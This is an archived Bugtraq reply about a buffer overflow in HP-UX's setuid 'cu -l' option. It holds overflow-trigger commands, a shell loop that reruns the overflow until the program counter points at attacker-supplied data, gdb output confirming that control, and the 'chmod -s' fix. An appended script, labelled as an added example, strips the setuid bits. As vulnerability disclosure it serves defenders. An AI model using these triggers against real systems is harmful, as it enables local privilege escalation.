[17558] in bugtraq


Re: HPUX cu -l option buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Wed Nov 8 14:52:35 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id:  <200011080913.LAA06369@gtc1.cps.unizar.es>
Date:         Wed, 8 Nov 2000 11:13:42 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <200011021343.eA2DhRU20236@tbird.iworld.com> from "zorgon" at Nov 2, 0 08:43:27 am

>
> =======================================================
>     HPUX cu -l option buffer overflow vulnerability
> =======================================================
>
> Date: 02/11/2000
> Tested on HP-UX B.11.00
>
> $ cu -l `perl -e 'printf "A" x 9777'`
>

    It's exploitable on 10.20 (trivial exploit: you don't even
    have to find a return address, the buffer itself gets executed)

    HP-UX 9.x 68k seems to be vulnerable too, but I don't have
    the exploit.

    On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
    you get with

    ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly (why?). Eventually you get a pointer to your
    data:


$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
    break
fi
done

[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known

Illegal instruction(coredump)
Memory fault(coredump)
core:           core file from 'cu' - received SIGSEGV


$  gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.

#0  0x7f7eb010 in ?? ()
#0  0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)
    Fix: chmod -s /bin/cu

--
finger spd@gtc1.cps.unizar.es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)

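The mitigation the reply ends with (`chmod -s /bin/cu`), turned into a checked procedure as an added example that is not part of the original post: the function names and the constructed temp file stand in for a real setuid cu, and the demonstration never touches /bin/cu itself.

```shell
#!/bin/sh
# Added example (not from the original post): verify and apply the
# "chmod -s" mitigation for a setuid binary such as cu, then confirm it.
# Function names and the demo path are assumptions for illustration.

# is_setuid PATH -> 0 if the file carries the setuid or setgid bit, 1 otherwise
is_setuid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# drop_setuid PATH -> strips setuid/setgid bits and returns 0 only if they are
# verified gone afterwards (a silently failed chmod is not a mitigation)
drop_setuid() {
    path=$1
    [ -f "$path" ] || { echo "no such file: $path" >&2; return 2; }
    if ! is_setuid "$path"; then
        echo "$path: not setuid/setgid, nothing to do"
        return 0
    fi
    chmod u-s,g-s "$path" || return 1
    if is_setuid "$path"; then
        echo "$path: still setuid/setgid after chmod" >&2
        return 1
    fi
    echo "$path: setuid/setgid bits removed"
}

# find_setuid NAME DIR... -> prints every setuid regular file called NAME
# under the given directories (e.g. find_setuid cu /bin /usr/bin)
find_setuid() {
    name=$1; shift
    find "$@" -type f -name "$name" -perm -4000 2>/dev/null
}

# Demonstration on a constructed temp file, so the real /bin/cu is untouched.
demo_cu=$(mktemp -d)/cu
printf '#!/bin/sh\nexit 0\n' > "$demo_cu"
chmod 4755 "$demo_cu"          # constructed sample: mode 4755 like a setuid cu
is_setuid "$demo_cu" && echo "before: $demo_cu is setuid"
drop_setuid "$demo_cu"
is_setuid "$demo_cu" || echo "after: $demo_cu is no longer setuid"
```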